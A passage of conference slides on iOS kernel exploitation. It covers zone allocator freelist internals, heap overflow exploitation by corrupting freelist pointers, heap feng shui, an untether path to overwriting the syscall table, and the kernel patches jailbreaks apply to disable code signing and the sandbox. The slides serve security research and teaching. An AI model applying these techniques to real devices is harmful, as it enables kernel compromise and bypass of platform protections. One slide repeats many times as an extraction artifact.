• the freelist is stored inbound
• first 4 bytes of a free block point to next
block on freelist

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 79


Zone Allocator Freelist - Removing Element
#define REMOVE_FROM_ZONE(zone, ret, type) \
MACRO_BEGIN \
(ret) = (type) (zone)->free_elements; \ head of freelist
if ((ret) != (type) 0) { \ will be returned
if (check_freed_element) { \
if (!is_kernel_data_addr(((vm_offset_t *)(ret))[0]) || \
((zone)->elem_size >= (2 * sizeof(vm_offset_t)) && \
((vm_offset_t *)(ret))[((zone)->elem_size/sizeof(vm_offset_t))-1] != \
((vm_offset_t *)(ret))[0])) \
panic("a freed zone element has been modified");\
if (zfree_clear) { \
unsigned int ii; \
for (ii = sizeof(vm_offset_t) / sizeof(uint32_t); \
ii < zone->elem_size/sizeof(uint32_t) - sizeof(vm_offset_t) / sizeof(uint32_t); \
ii++) \
if (((uint32_t *)(ret))[ii] != (uint32_t)0xdeadbeef) \
panic("a freed zone element has been modified");\
} \ new head of freelist is
} \ read from previous head
(zone)->count++; \
(zone)->free_elements = *((vm_offset_t *)(ret)); \
} \
MACRO_END grey code is only activated by debugging boot-args
Apple seems to think about activating it by default

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 80


Zone Allocator Freelist - Adding Element

#define ADD_TO_ZONE(zone, element) \


MACRO_BEGIN \
if (zfree_clear) \
{ unsigned int i; \
for (i=0; \
i < zone->elem_size/sizeof(uint32_t); \

i++) \
((uint32_t *)(element))[i] = 0xdeadbeef; \
current head of freelist
} \ is written to start of free block
*((vm_offset_t *)(element)) = (zone)->free_elements; \
if (check_freed_element) { \
if ((zone)->elem_size >= (2 * sizeof(vm_offset_t))) \
((vm_offset_t *)(element))[((zone)->elem_size/sizeof(vm_offset_t))-1] = \
(zone)->free_elements; \
free block is made
} \ the head of the freelist
(zone)->free_elements = (vm_offset_t) (element); \
(zone)->count--; \
MACRO_END
grey code is only activated by debugging boot-args
Apple seems to think about activating it by default

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 81


Exploiting Heap Overflows in Zone Memory

• attacking “application“ data


• carefully crafting allocations / deallocations
• interesting kernel data structure is allocated behind overflowing block
• impact and further exploitation depends on the overwritten data structure

 this is the way to go if Apple adds some mitigations in the future

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 82


Exploiting Heap Overflows in Zone Memory

• attacking inbound freelist of zone allocator


• carefully crafting allocations / deallocations
• free block is behind overflowing block
• overflow allows to control next pointer in freelist
• when this free block is used head of freelist is controlled
• next allocation will return attacker supplied memory address
• we can write any data anywhere

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 83


Kernel Heap Manipulation

• we need heap manipulation primitives


• allocation of a block of specific size
• deallocation of a block

• for our demo vulnerability this is easy


• allocation of kernel heap by connecting to a ndrv socket
• length of socket name controls size of allocated heap block
• deallocation of kernel heap by closing a socket

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 84


Kernel Heap Feng Shui shortly explain the origin of
Heap Feng Shui

Sotirov ...

• Heap Feng Shui


• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 85


Kernel Heap Feng Shui

• Heap Feng Shui


• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 86


Kernel Heap Feng Shui

• Heap Feng Shui


• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 87


Kernel Heap Feng Shui

• Heap Feng Shui


• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 88


Kernel Heap Feng Shui

• Heap Feng Shui


• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 89


Kernel Heap Feng Shui

• Heap Feng Shui


• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 90


Kernel Heap Feng Shui

• Heap Feng Shui


• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 91


Kernel Heap Feng Shui

• Heap Feng Shui


• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 92


Kernel Heap Feng Shui

• Heap Feng Shui


• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 93


Kernel Heap Feng Shui

• Heap Feng Shui


• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 94


Kernel Heap Feng Shui

• Heap Feng Shui


• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 95


Kernel Heap Feng Shui

• Heap Feng Shui


• allocation is repeated often enough so that all holes are closed
• and repeated a bit more so that we have consecutive memory blocks
• now deallocation can poke holes
• next allocation will be into a hole
• so that buffer overflow can be controlled

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 96


Current Heap State - A Gift by iOS

/* * Returns information about the memory allocation zones. *


Supported in all kernels.. */routine host_zone_info(
host : host_t; out names :
• technique does work without zone_name_array_t, Dealloc;
out info :
knowing the heap state zone_info_array_t, Dealloc);

• heap filling is just repeated


often enough

• but how often is enough?


• iOS has a gift for us: typedef struct zone_info {
integer_t zi_count; /* Number of elements used now */
host_zone_info() mach call vm_size_t zi_cur_size; /* current memory utilization */
vm_size_t zi_max_size; /* how large can this zone grow */

• call makes number of holes in vm_size_t zi_elem_size; /* size of an element */


vm_size_t zi_alloc_size; /* size used for more memory */
kernel zone available to user integer_t zi_pageable; /* zone pageable? */
integer_t zi_sleepable; /* sleep if empty? */
integer_t zi_exhaustible; /* merely return if empty? */
integer_t zi_collectable; /* garbage collect elements? */
} zone_info_t;

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 97


From Heap Overflow to Code Execution

• in the iOS 4.3.1-4.3.3 untether exploit a free memory block is overwritten


• ndrv_to_ifnet_demux() writes a pointer to memory we control
• next allocation will put this pointer to our fake free block on top of freelist
• next allocation will put the pointer inside the fake free block on top of freelist
• next allocation will return the pointer from the fake free block
• this pointer points right in the middle of the syscall table
• application data written into it allows to replace the syscall handlers

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 98


Part VI
Jailbreaker‘s Kernel Patches

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 99


What do Jailbreaks patch?

• repair any kernel memory corruption caused by exploit


• disable security features of iOS in order to jailbreak
• exact patches depend on the group releasing the jailbreak
• most groups rely on a list of patches generated by comex

 https://github.com/comex/datautils0/blob/master/make_kernel_patchfile.c

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 100
Restrictions and Code Signing

• proc_enforce
• sysctl variable controlling different process management enforcements
• disabled allows debugging and execution of wrongly signed binaries
• nowadays write protected from “root“

• cs_enforcement_disable
• boot-arg that disables codesigning enforcement
• enabled allows to get around codesigning

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 101
PE_i_can_has_debugger

variable
patched to 1

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 102
vm_map_enter

replaced with NOP

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 103
vm_map_protect

replaced with NOP

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 104
AMFI Binary Trust Cache Patch

replaced with

MOV R0, 1
BX LR

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 105
Patching the Sandbox

function is hooked

so that a new sb_evaluate() is used

for further info see https://github.com/comex/datautils0/blob/master/sandbox.S

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 106
Questions

Checkout my github
https://github.com/stefanesser

Stefan Esser • iOS Kernel Exploitation - IOKit Edition • November 2011 • 107

You might also like